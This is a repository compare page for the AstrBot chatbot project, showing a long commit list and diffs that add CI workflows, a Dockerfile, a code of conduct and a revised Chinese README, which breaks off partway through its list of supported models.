Compare commits
612 Commits
publish2.5
...
v3.2.0
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
f67b171385 | ||
|
|
1780d1355d | ||
|
|
5a3390e4f3 | ||
|
|
337d96b41d | ||
|
|
38a1dfea98 | ||
|
|
fbef73aeec | ||
|
|
d6214c2b7c | ||
|
|
d58c86f6fc | ||
|
|
ea34c20198 | ||
|
|
934ca94e62 | ||
|
|
1775327c2e | ||
|
|
707fcad8b4 | ||
|
|
f143c5afc6 | ||
|
|
99f94b2611 | ||
|
|
e39c1f9116 | ||
|
|
235e0b9b8f | ||
|
|
d5a9bed8a4 | ||
|
|
d7dc8a7612 | ||
|
|
08cd3ca40c | ||
|
|
a13562dcea | ||
|
|
d7a0c0d1d0 | ||
|
|
c0729b2d29 | ||
|
|
a80f474290 | ||
|
|
699207dd54 | ||
|
|
e7708010c9 | ||
|
|
f66091e08f | ||
|
|
03bb932f8f | ||
|
|
fbf8b349e0 | ||
|
|
e9278fce6a | ||
|
|
9a7db956d5 | ||
|
|
13196dd667 | ||
|
|
52b80e24d2 | ||
|
|
7dff87e65d | ||
|
|
31ee64d1b2 | ||
|
|
8e865b6918 | ||
|
|
66f91e5832 | ||
|
|
cd2d368f9c | ||
|
|
7736c1c9bd | ||
|
|
6728c0b7b5 | ||
|
|
344f92e0e7 | ||
|
|
fdabfef6a7 | ||
|
|
6c5718f134 | ||
|
|
edfde51434 | ||
|
|
3fc1347bba | ||
|
|
e643eea365 | ||
|
|
1af481f5f9 | ||
|
|
317d1c4c41 | ||
|
|
a703860512 | ||
|
|
1cd1c8ea0d | ||
|
|
53ef3bbf4f | ||
|
|
ab7b8aad7c | ||
|
|
c49213282b | ||
|
|
3c87fc5b31 | ||
|
|
9684508e1d | ||
|
|
bb0edae200 | ||
|
|
acb68a4a1e | ||
|
|
46dd6f3243 | ||
|
|
ecab072890 | ||
|
|
148534d3c2 | ||
|
|
1278f16973 | ||
|
|
7d9b3c6c5c | ||
|
|
83dcb5165c | ||
|
|
30862bb82f | ||
|
|
6c0bda8feb | ||
|
|
e14dece206 | ||
|
|
680593d636 | ||
|
|
144440214f | ||
|
|
6667b58a3f | ||
|
|
b55d9533be | ||
|
|
3484fc60e6 | ||
|
|
eac0265522 | ||
|
|
ac74431633 | ||
|
|
4c098200be | ||
|
|
2cf18972f3 | ||
|
|
d522d2a6a9 | ||
|
|
7079ce096f | ||
|
|
5e8c5067b1 | ||
|
|
570ff4e8b6 | ||
|
|
e2f1362a1f | ||
|
|
3519e38211 | ||
|
|
08734250f7 | ||
|
|
e8407f6449 | ||
|
|
04f3400f83 | ||
|
|
89c8b3e7fc | ||
|
|
66294100ec | ||
|
|
8ed8a23c8b | ||
|
|
449b0b03b5 | ||
|
|
d93754bf1d | ||
|
|
a007a61ecc | ||
|
|
e481377317 | ||
|
|
4c5831c7b4 | ||
|
|
fc54b5237f | ||
|
|
f8f42678d1 | ||
|
|
38b1f4128c | ||
|
|
04fb4f88ad | ||
|
|
4675f5df08 | ||
|
|
34ee358d40 | ||
|
|
c4cfd1a3e2 | ||
|
|
5ac4748537 | ||
|
|
2e5ec1d2dc | ||
|
|
bac4c069d7 | ||
|
|
9d4a21a10b | ||
|
|
dbeb41195d | ||
|
|
71f4998458 | ||
|
|
40af5b7574 | ||
|
|
e7a1020f82 | ||
|
|
018e49ed95 | ||
|
|
582cfe9f7c | ||
|
|
db07f740b3 | ||
|
|
bacbd351d7 | ||
|
|
7e2c61c661 | ||
|
|
3df30fd4de | ||
|
|
92789ffdc9 | ||
|
|
09b746cdec | ||
|
|
8ace7b59e3 | ||
|
|
1fc0248d8f | ||
|
|
57bde33bfe | ||
|
|
1b1e558a3b | ||
|
|
c5c7e686d0 | ||
|
|
bd28f880f6 | ||
|
|
fe2ab69773 | ||
|
|
75f9d383cb | ||
|
|
5fefba4583 | ||
|
|
780d126437 | ||
|
|
4057dd9f5b | ||
|
|
b5f8df4bb6 | ||
|
|
5ace10d39f | ||
|
|
07ecdedf0d | ||
|
|
c2ca365312 | ||
|
|
8b9ca08903 | ||
|
|
16e6b588f6 | ||
|
|
3a1d5d8904 | ||
|
|
84d1293fd0 | ||
|
|
a12be7fa77 | ||
|
|
6eee4f678f | ||
|
|
0e53c95c06 | ||
|
|
3ba97ad0dc | ||
|
|
99ff8bc1f5 | ||
|
|
63aa6ee9a5 | ||
|
|
925a42e2c4 | ||
|
|
8dc91cfed4 | ||
|
|
9c6bdeea9d | ||
|
|
9bc8ac10fa | ||
|
|
3df3879954 | ||
|
|
be1f8e7075 | ||
|
|
d602041ad0 | ||
|
|
23882bcb8e | ||
|
|
311178189f | ||
|
|
5a57526aab | ||
|
|
450dd34f4d | ||
|
|
89ed31a888 | ||
|
|
9fe031efe3 | ||
|
|
baa57266b4 | ||
|
|
3e4818d0ee | ||
|
|
b36747c728 | ||
|
|
fdbe993913 | ||
|
|
9c3c8ff2c4 | ||
|
|
aaefdab0aa | ||
|
|
f18a311bc2 | ||
|
|
ad9705f9c4 | ||
|
|
fb0b626813 | ||
|
|
b48fbf10e1 | ||
|
|
4aa2eab8b6 | ||
|
|
3960a19bcb | ||
|
|
b3cec4781b | ||
|
|
8f0b0bf0d0 | ||
|
|
847672d7f1 | ||
|
|
c7f2962654 | ||
|
|
752201cb46 | ||
|
|
deebf61b5f | ||
|
|
d5e5b06e86 | ||
|
|
cb5975c102 | ||
|
|
5b1aee1b4d | ||
|
|
510c8b4236 | ||
|
|
89fc7b0553 | ||
|
|
123c21fcb3 | ||
|
|
75d62d66f9 | ||
|
|
23a8e989a5 | ||
|
|
9577e637f1 | ||
|
|
e51ef2201b | ||
|
|
f4ae503abf | ||
|
|
3424b658f3 | ||
|
|
3198f73f3d | ||
|
|
aa3262a8ab | ||
|
|
6acd7be547 | ||
|
|
fb7669ddad | ||
|
|
f2c4ef126e | ||
|
|
33dcc4c152 | ||
|
|
b9e331ebd6 | ||
|
|
7832ec386e | ||
|
|
b9828428cc | ||
|
|
da11034aec | ||
|
|
578c9e0695 | ||
|
|
cc675a9b4f | ||
|
|
08e7d4d0c6 | ||
|
|
553f1b8d83 | ||
|
|
73e7e2088d | ||
|
|
e40c9de610 | ||
|
|
2f4e0bb4f2 | ||
|
|
191976e22e | ||
|
|
52656b8586 | ||
|
|
998e29ded6 | ||
|
|
5bbe3f12d6 | ||
|
|
56aea81ed7 | ||
|
|
7b8a311dde | ||
|
|
b75d20a3e8 | ||
|
|
67faa587b6 | ||
|
|
15fde686d4 | ||
|
|
741284f6e8 | ||
|
|
8352fc269b | ||
|
|
5852f36557 | ||
|
|
cc1c723c12 | ||
|
|
adf5cbfeba | ||
|
|
d6d0516c9a | ||
|
|
8aab10aaf3 | ||
|
|
4fe5616ae1 | ||
|
|
7e1c76a3f5 | ||
|
|
f74665ff71 | ||
|
|
a96d64fe88 | ||
|
|
fd2aa0cba6 | ||
|
|
a92ea3db02 | ||
|
|
d7a513b640 | ||
|
|
8a017ff693 | ||
|
|
7d08f57b32 | ||
|
|
6f4ad7890b | ||
|
|
37488118a6 | ||
|
|
b2da0778ae | ||
|
|
cc887a5037 | ||
|
|
ca86a02d30 | ||
|
|
d652dc19a6 | ||
|
|
6a56b7bff5 | ||
|
|
81e8997852 | ||
|
|
372a204ba9 | ||
|
|
15ad5aae35 | ||
|
|
fd2e9ef93f | ||
|
|
5be3bf1f46 | ||
|
|
4915c2d480 | ||
|
|
bd56a19ac5 | ||
|
|
da8fa2d905 | ||
|
|
f56fd100d7 | ||
|
|
b725a1a20c | ||
|
|
ff1b5d02d2 | ||
|
|
d4882a8240 | ||
|
|
e37f84c1ae | ||
|
|
a23bd0a63c | ||
|
|
ae00e84974 | ||
|
|
53b3250978 | ||
|
|
7f15a59a4e | ||
|
|
6a164c9961 | ||
|
|
bd779a3df3 | ||
|
|
9ebb340c00 | ||
|
|
e8edbaae2d | ||
|
|
2aab1f4c96 | ||
|
|
90ea621c65 | ||
|
|
34bdceb41b | ||
|
|
6d2ded1c6c | ||
|
|
9b926048ca | ||
|
|
9cf4f0f57d | ||
|
|
9123b9d773 | ||
|
|
f9258ae1e1 | ||
|
|
d8808de4a9 | ||
|
|
afcb152d8d | ||
|
|
ff01174a1f | ||
|
|
71f1625284 | ||
|
|
19e3390083 | ||
|
|
3015b90e12 | ||
|
|
aa419f3ef9 | ||
|
|
954236c284 | ||
|
|
72d6b3886b | ||
|
|
a95046ecaf | ||
|
|
ccdb11575b | ||
|
|
7e68b2f2be | ||
|
|
39efab1081 | ||
|
|
cc6707c8ce | ||
|
|
09080adf84 | ||
|
|
4cc72030c0 | ||
|
|
a395902184 | ||
|
|
5156f0584a | ||
|
|
be171fe0d7 | ||
|
|
ad4bf5e654 | ||
|
|
da7429ad62 | ||
|
|
b5f20ee282 | ||
|
|
a9023d6f3a | ||
|
|
628b661a18 | ||
|
|
638fe466f8 | ||
|
|
a90adcf15c | ||
|
|
7896066db6 | ||
|
|
b1314bcc31 | ||
|
|
b1ecc929f2 | ||
|
|
3aad42a886 | ||
|
|
b6e87d3d31 | ||
|
|
461eb4b9c7 | ||
|
|
a89e92d5cc | ||
|
|
6e69e88e91 | ||
|
|
ae732c1dac | ||
|
|
8e4a72c97b | ||
|
|
bf0d82fe67 | ||
|
|
987383f957 | ||
|
|
c2cacf3281 | ||
|
|
72878477dc | ||
|
|
ad0d14420a | ||
|
|
5a7c60c81e | ||
|
|
6011840d1f | ||
|
|
9a2dffe299 | ||
|
|
e6770d2b12 | ||
|
|
255db6ee57 | ||
|
|
aa9ff99557 | ||
|
|
5f024e9f30 | ||
|
|
cbdc7b7ce4 | ||
|
|
5f636ca061 | ||
|
|
9fa3651170 | ||
|
|
bba66788c3 | ||
|
|
200f3cce00 | ||
|
|
938490b739 | ||
|
|
e77e7b050a | ||
|
|
bd2dbe5b63 | ||
|
|
c684d9cb4a | ||
|
|
7a39a9d45e | ||
|
|
2a3bb068db | ||
|
|
1aa4384ca3 | ||
|
|
3b26b7b26c | ||
|
|
3b097d662b | ||
|
|
c3acb3e77f | ||
|
|
55d58d30a8 | ||
|
|
020a8ace9f | ||
|
|
15f56ffc01 | ||
|
|
3724659b32 | ||
|
|
df77152581 | ||
|
|
339ea5f12a | ||
|
|
36f96ccc97 | ||
|
|
190e0a4971 | ||
|
|
72638fac68 | ||
|
|
807d19e381 | ||
|
|
10870172b4 | ||
|
|
1f7d3eccf9 | ||
|
|
5fc58123bb | ||
|
|
c84c9f4aaa | ||
|
|
cabe66fc0a | ||
|
|
9f1315b06d | ||
|
|
6f27f59730 | ||
|
|
17815e7fe3 | ||
|
|
596ae80fea | ||
|
|
be2dc6ba70 | ||
|
|
e5aa8c8270 | ||
|
|
7c5ac41c55 | ||
|
|
c6cf1153c1 | ||
|
|
a68338b651 | ||
|
|
bab46e912e | ||
|
|
4b158a1c89 | ||
|
|
6894900e46 | ||
|
|
2e11d6e007 | ||
|
|
348381be15 | ||
|
|
9024c28e70 | ||
|
|
ae1702901b | ||
|
|
c1c0df85e6 | ||
|
|
f3c6d9c02b | ||
|
|
811a885411 | ||
|
|
b4ec28b71c | ||
|
|
cdf4a5321b | ||
|
|
d83f155f80 | ||
|
|
4c402ed5bd | ||
|
|
ec5aff8d0b | ||
|
|
eae0d6c422 | ||
|
|
9c284b84b1 | ||
|
|
9f36e5ae05 | ||
|
|
7caa380e54 | ||
|
|
41d81bb60e | ||
|
|
454a74f4e1 | ||
|
|
c5bdad02e5 | ||
|
|
f46de3d518 | ||
|
|
a3e21bea1a | ||
|
|
d7e4707d5d | ||
|
|
a78ebf2fd7 | ||
|
|
bd11541678 | ||
|
|
0d99aa81e6 | ||
|
|
f104d40d0a | ||
|
|
0d69f8ab8a | ||
|
|
66d1fc08b6 | ||
|
|
e32fc27728 | ||
|
|
eec890cd02 | ||
|
|
d30881e59b | ||
|
|
9afaf83368 | ||
|
|
33f9a9cfa0 | ||
|
|
bf72d5fa27 | ||
|
|
567c29bcd6 | ||
|
|
dcdfe453fb | ||
|
|
0d23c0900b | ||
|
|
86eda7bdf8 | ||
|
|
1e46525b0f | ||
|
|
8d41efea4d | ||
|
|
f15d0eb0eb | ||
|
|
1795362bcd | ||
|
|
2bf9c82617 | ||
|
|
33793a2053 | ||
|
|
656fe14af4 | ||
|
|
46197d49a4 | ||
|
|
843ab56f50 | ||
|
|
6b4b52f3c5 | ||
|
|
392e5cd592 | ||
|
|
d273019830 | ||
|
|
fd59ec4b6c | ||
|
|
bf33ccafca | ||
|
|
425936872d | ||
|
|
6627b2e1e5 | ||
|
|
323c2cecf8 | ||
|
|
5b1dd3dce9 | ||
|
|
54af770dfb | ||
|
|
30a48fea6e | ||
|
|
cfd5fb1452 | ||
|
|
a78984376f | ||
|
|
9887cae43c | ||
|
|
e63fe60f8d | ||
|
|
b0ac2d676c | ||
|
|
5ef515165c | ||
|
|
e21d43f920 | ||
|
|
3a80ffad88 | ||
|
|
47506d60cd | ||
|
|
b999b712b7 | ||
|
|
6860ba3f05 | ||
|
|
02594867c0 | ||
|
|
250435f3e7 | ||
|
|
3c593fb6f7 | ||
|
|
807cad5c48 | ||
|
|
e92ecdd3f8 | ||
|
|
1c91079d8f | ||
|
|
376b2fef40 | ||
|
|
300f3b6df8 | ||
|
|
6e6f6d5cd4 | ||
|
|
077e54d0f1 | ||
|
|
18ffaa2b91 | ||
|
|
a6555681a0 | ||
|
|
43ac0ef87c | ||
|
|
754842be7c | ||
|
|
5b3ee2dbe8 | ||
|
|
ca5a1ddc0b | ||
|
|
c9821132ad | ||
|
|
0641dca2a6 | ||
|
|
fd983b9f5d | ||
|
|
7e1e51c450 | ||
|
|
d912b990e4 | ||
|
|
8224aa87a5 | ||
|
|
4cb5abc7b6 | ||
|
|
743a800b0d | ||
|
|
a5c43612bf | ||
|
|
e2bd612b8e | ||
|
|
3ddb65e399 | ||
|
|
56775580fc | ||
|
|
8f7703c158 | ||
|
|
7aba9ff3ff | ||
|
|
aea1271a94 | ||
|
|
b575f195c9 | ||
|
|
1eedf7b332 | ||
|
|
d327a1041b | ||
|
|
10a3ba7dd4 | ||
|
|
deaa4ea910 | ||
|
|
fbfceb3137 | ||
|
|
e7b9d7cd54 | ||
|
|
34aba58351 | ||
|
|
e1639be6c3 | ||
|
|
80975c5715 | ||
|
|
c12a4f7353 | ||
|
|
defab688e5 | ||
|
|
2244386d33 | ||
|
|
39244fa27f | ||
|
|
20c19905ac | ||
|
|
8086d645f9 | ||
|
|
3a3289bf04 | ||
|
|
1711ff3bb5 | ||
|
|
b945913f88 | ||
|
|
d31533ed82 | ||
|
|
0fb2ec2c76 | ||
|
|
89847cbc83 | ||
|
|
9d12bb23fd | ||
|
|
79af4ce381 | ||
|
|
79f293e248 | ||
|
|
e75a0fec01 | ||
|
|
a935b085d4 | ||
|
|
4ef0a14420 | ||
|
|
8273154904 | ||
|
|
71d6ef3b52 | ||
|
|
119b3a090a | ||
|
|
496df3347b | ||
|
|
2b70eef35b | ||
|
|
c4071eedf8 | ||
|
|
b6cc866113 | ||
|
|
6aabcdeac7 | ||
|
|
72bccee9e2 | ||
|
|
b54f934fcd | ||
|
|
43dc0f96ff | ||
|
|
e02a82fa72 | ||
|
|
9f91b0c92b | ||
|
|
d14d6364a3 | ||
|
|
15c8f0b6f7 | ||
|
|
9bca158174 | ||
|
|
45bb30692d | ||
|
|
5bf73caba7 | ||
|
|
e5389f620a | ||
|
|
61fd52ff61 | ||
|
|
73c46bd812 | ||
|
|
d8173122e0 | ||
|
|
1af6e77dd1 | ||
|
|
ce476ca163 | ||
|
|
0a1df90a83 | ||
|
|
762f5ea30f | ||
|
|
06e7753797 | ||
|
|
c5e1f8d3e9 | ||
|
|
221433725b | ||
|
|
28864cd066 | ||
|
|
854f70dc8b | ||
|
|
435b988223 | ||
|
|
ecc119b296 | ||
|
|
209f3aa136 | ||
|
|
8935859934 | ||
|
|
6c77ec3534 | ||
|
|
291d3ebae8 | ||
|
|
5b97fd2e6f | ||
|
|
4de8c5ed7d | ||
|
|
09333d1604 | ||
|
|
60240ca9a1 | ||
|
|
3e45ec0a08 | ||
|
|
4aad04b31a | ||
|
|
99ff3f8d42 | ||
|
|
f9a7a723aa | ||
|
|
7bb4ad648a | ||
|
|
7c3cb98cf8 | ||
|
|
0cc6bc0f1d | ||
|
|
4181d62b5c | ||
|
|
7a1c0b0821 | ||
|
|
b74d32c2c8 | ||
|
|
e320bb5ab8 | ||
|
|
076cfd3e97 | ||
|
|
515a937c07 | ||
|
|
2c5451120e | ||
|
|
e6f6bee7ee | ||
|
|
1a137a8639 | ||
|
|
c8f6d090cc | ||
|
|
b7b7877dfc | ||
|
|
608bd0398e | ||
|
|
2541663b77 | ||
|
|
5d774f3d7b | ||
|
|
6ea1366e73 | ||
|
|
134a8e233a | ||
|
|
6ccfc674a5 | ||
|
|
37e9373561 | ||
|
|
bfa8f137de | ||
|
|
66a85cddf5 | ||
|
|
bf84e74490 | ||
|
|
3d8f96ef8a | ||
|
|
84c57a47ad | ||
|
|
5e101bb3c0 | ||
|
|
246fbd6337 | ||
|
|
9938e4392a | ||
|
|
10cda13213 | ||
|
|
f3722b31d5 | ||
|
|
673a4e2c7f | ||
|
|
1d8fba05b6 | ||
|
|
7c06883975 | ||
|
|
6da12b7a67 | ||
|
|
0342d752e6 | ||
|
|
a851e34c94 | ||
|
|
ad8aed5724 | ||
|
|
75101bf270 | ||
|
|
43df7003d6 | ||
|
|
502703b749 | ||
|
|
8365f39f95 | ||
|
|
aa5f8db59d | ||
|
|
d2b60b72d9 | ||
|
|
14c36ceb52 | ||
|
|
cdc3bdd769 | ||
|
|
48d0c2a8c8 | ||
|
|
6923979014 | ||
|
|
03239439c9 | ||
|
|
da3381a887 | ||
|
|
a1253cc241 | ||
|
|
ffe10cc5c2 | ||
|
|
7093cf5ab8 | ||
|
|
979a0cdd2e | ||
|
|
b495a11d1f | ||
|
|
8698e87e51 | ||
|
|
6d2f9e5ba8 | ||
|
|
0e24e107d6 | ||
|
|
888a4e89ab | ||
|
|
1a55684ae8 | ||
|
|
858712dcbc | ||
|
|
ad4d068bbc | ||
|
|
0f5a2101b7 | ||
|
|
7bc9d8dc7b | ||
|
|
506a62e6e6 | ||
|
|
44e22087d8 | ||
|
|
d88c06578d | ||
|
|
93bc12a89c | ||
|
|
eedcb9b825 | ||
|
|
b8fe50a196 | ||
|
|
10b1538118 | ||
|
|
09cfd18f6f | ||
|
|
d01be66344 | ||
|
|
c0e4d0595b | ||
|
|
d403323a36 | ||
|
|
3092bbd210 | ||
|
|
9d2cd27705 | ||
|
|
ec48b57358 | ||
|
|
54cdca01d3 | ||
|
|
4b35f7f8fd | ||
|
|
651ba7b3d6 | ||
|
|
cd1390d449 | ||
|
|
d478ff02b6 | ||
|
|
1da3a19ddd | ||
|
|
db66cbfb9c | ||
|
|
51729f4a50 | ||
|
|
d739abef60 | ||
|
|
2ecb3fc7cf | ||
|
|
69c576086e |
23
.github/workflows/docker-image.yml
vendored
Normal file
@@ -0,0 +1,23 @@
|
||||
name: Docker Image CI/CD
|
||||
|
||||
on:
|
||||
release:
|
||||
types: [published]
|
||||
workflow_dispatch:
|
||||
jobs:
|
||||
publish-latest-docker-image:
|
||||
runs-on: ubuntu-latest
|
||||
name: Build and publish docker image
|
||||
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v2
|
||||
- name: Build image
|
||||
run: |
|
||||
git clone https://github.com/Soulter/AstrBot
|
||||
cd AstrBot
|
||||
docker build -t ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest .
|
||||
- name: Publish image
|
||||
run: |
|
||||
docker login -u ${{ secrets.DOCKER_HUB_USERNAME }} -p ${{ secrets.DOCKER_HUB_PASSWORD }}
|
||||
docker push ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest
|
||||
27
.github/workflows/stale.yml
vendored
Normal file
@@ -0,0 +1,27 @@
|
||||
# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
|
||||
#
|
||||
# You can adjust the behavior by modifying this file.
|
||||
# For more information, see:
|
||||
# https://github.com/actions/stale
|
||||
name: Mark stale issues and pull requests
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: '21 23 * * *'
|
||||
|
||||
jobs:
|
||||
stale:
|
||||
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
issues: write
|
||||
pull-requests: write
|
||||
|
||||
steps:
|
||||
- uses: actions/stale@v5
|
||||
with:
|
||||
repo-token: ${{ secrets.GITHUB_TOKEN }}
|
||||
stale-issue-message: 'Stale issue message'
|
||||
stale-pr-message: 'Stale pull request message'
|
||||
stale-issue-label: 'no-issue-activity'
|
||||
stale-pr-label: 'no-pr-activity'
|
||||
13
.gitignore
vendored
Normal file
@@ -0,0 +1,13 @@
|
||||
__pycache__
|
||||
botpy.log
|
||||
.vscode
|
||||
data.db
|
||||
configs/session
|
||||
configs/config.yaml
|
||||
**/.DS_Store
|
||||
temp
|
||||
cmd_config.json
|
||||
addons/plugins/
|
||||
data/*
|
||||
cookies.json
|
||||
logs/
|
||||
3
.vscode/settings.json
vendored
@@ -1,3 +0,0 @@
|
||||
{
|
||||
"python.analysis.typeCheckingMode": "basic"
|
||||
}
|
||||
128
CODE_OF_CONDUCT.md
Normal file
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
SoulterL@outlook.com.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
8
Dockerfile
Normal file
@@ -0,0 +1,8 @@
|
||||
FROM python:3.10.13-bullseye
|
||||
WORKDIR /AstrBot
|
||||
|
||||
COPY . /AstrBot/
|
||||
|
||||
RUN python -m pip install -r requirements.txt
|
||||
|
||||
CMD [ "python", "main.py" ]
|
||||
135
README.md
@@ -1,20 +1,70 @@
|
||||
# 2023/3/2 已支持官方ChatGPT API,性能更好!!!
|
||||
<p align="center">
|
||||
|
||||
<img src="https://github.com/Soulter/AstrBot/assets/37870767/b1686114-f3aa-4963-b07f-28bf83dc0a10" alt="QQChannelChatGPT" width="200" />
|
||||
</p>
|
||||
<div align="center">
|
||||
|
||||
## ⭐体验
|
||||
# AstrBot
|
||||
|
||||
使用手机QQ扫码加入QQ频道(频道名: GPT机器人 | 频道号: x42d56aki2)
|
||||
[](https://github.com/Soulter/AstrBot/releases/latest)
|
||||
<img src="https://wakatime.com/badge/user/915e5316-99c6-4563-a483-ef186cf000c9/project/34412545-2e37-400f-bedc-42348713ac1f.svg" alt="wakatime">
|
||||
<img src="https://img.shields.io/badge/python-3.9+-blue.svg" alt="python">
|
||||
<a href="https://hub.docker.com/r/soulter/astrbot"><img alt="Docker pull" src="https://img.shields.io/docker/pulls/soulter/astrbot.svg"/></a>
|
||||
<a href="https://qm.qq.com/cgi-bin/qm/qr?k=EYGsuUTfe00_iOu9JTXS7_TEpMkXOvwv&jump_from=webapi&authKey=uUEMKCROfsseS+8IzqPjzV3y1tzy4AkykwTib2jNkOFdzezF9s9XknqnIaf3CDft">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/QQ群-322154837-purple">
|
||||
</a>
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/频道-x42d56aki2-purple">
|
||||
|
||||

|
||||
<a href="https://astrbot.soulter.top/center">项目部署</a> |
|
||||
<a href="https://github.com/Soulter/QQChannelChatGPT/issues">问题提交</a> |
|
||||
<a href="https://astrbot.soulter.top/center/docs/%E5%BC%80%E5%8F%91/%E6%8F%92%E4%BB%B6%E5%BC%80%E5%8F%91">插件开发(最少只需 25 行)</a>
|
||||
</div>
|
||||
|
||||
**Windows用户推荐Windows一键安装,请前往Release下载最新版本**
|
||||
## 🤔您可能想了解的
|
||||
- **如何部署?** [帮助文档](https://astrbot.soulter.top/center/docs/%E9%83%A8%E7%BD%B2/%E9%80%9A%E8%BF%87Docker%E9%83%A8%E7%BD%B2) (部署不成功欢迎进群捞人解决<3)
|
||||
- **go-cqhttp启动不成功、报登录失败?** [在这里搜索解决方法](https://github.com/Mrs4s/go-cqhttp/issues)
|
||||
- **程序闪退/机器人启动不成功?** [提交issue或加群反馈](https://github.com/Soulter/QQChannelChatGPT/issues)
|
||||
- **如何开启 ChatGPT、Claude、HuggingChat 等语言模型?** [查看帮助](https://astrbot.soulter.top/center/docs/%E4%BD%BF%E7%94%A8/%E5%A4%A7%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B)
|
||||
|
||||
**详细部署教程链接**https://soulter.top/posts/qpdg.html
|
||||
## 🧩功能:
|
||||
|
||||
有任何问题请加频道反馈。
|
||||
✨ 最近功能:
|
||||
1. 可视化面板
|
||||
2. Docker 一键部署项目:[链接](https://astrbot.soulter.top/center/docs/%E9%83%A8%E7%BD%B2/%E9%80%9A%E8%BF%87Docker%E9%83%A8%E7%BD%B2)
|
||||
|
||||
## ⭐功能:
|
||||
🌍支持的消息平台/接口
|
||||
- go-cqhttp(QQ、QQ频道)
|
||||
- QQ 官方机器人接口
|
||||
- Telegram(由 [astrbot_plugin_telegram](https://github.com/Soulter/astrbot_plugin_telegram) 插件支持)
|
||||
|
||||
🌍支持的AI语言模型一览:
|
||||
|
||||
**文字模型/图片理解**
|
||||
|
||||
- OpenAI GPT-3(原生支持)
|
||||
- OpenAI GPT-3.5(原生支持)
|
||||
